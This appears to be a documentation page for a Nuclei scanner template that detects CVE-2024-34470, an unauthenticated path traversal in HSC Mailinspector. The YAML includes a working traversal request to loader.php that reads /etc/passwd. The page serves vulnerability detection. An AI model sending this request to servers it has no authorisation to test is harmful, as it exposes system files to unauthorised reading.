HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion
ID: CVE-2024-34470
Severity: high
Author: topscoder
Tags: cve,cve2024,lfi,mailinspector,hsc
Description
Section titled “Description”An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server.
YAML Source
Section titled “YAML Source”id: CVE-2024-34470
info: name: HSC Mailinspector 5.2.17-3 through 5.2.18 - Local File Inclusion author: topscoder severity: high description: | An Unauthenticated Path Traversal vulnerability exists in the /public/loaderphp file The path parameter does not properly filter whether the file and directory passed are part of the webroot, allowing an attacker to read arbitrary files on the server. reference: - https://github.com/osvaldotenorio/CVE-2024-34470 - https://github.com/nomi-sec/PoC-in-GitHub - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2024-34470 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cwe-id: CWE-22 epss-score: 0.00043 epss-percentile: 0.0866 metadata: verified: true max-request: 2 fofa-query: "mailinspector/public" tags: cve,cve2024,lfi,mailinspector,hsc
flow: http(1) && http(2)
http: - method: GET path: - "{{BaseURL}}/mailinspector/login.php"
host-redirects: true matchers: - type: word part: body words: - "Licensed to HSC TREINAMENTO"
- method: GET path: - "{{BaseURL}}/mailinspector/public/loader.php?path=../../../../../../../etc/passwd"
matchers-condition: and matchers: - type: regex part: body regex: - "root:.*:0:0:"
- type: status status: - 200# digest: 490a0046304402202743c8201d204534b2a4604517268c125bf1843bed6342c78f6da085804b0ebd02205fd7b5060dcc8b20dfe31d1e0b9e9cf7fc84a6fa0ce3eb0afc296fcbc268c7dd:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-34470.yaml"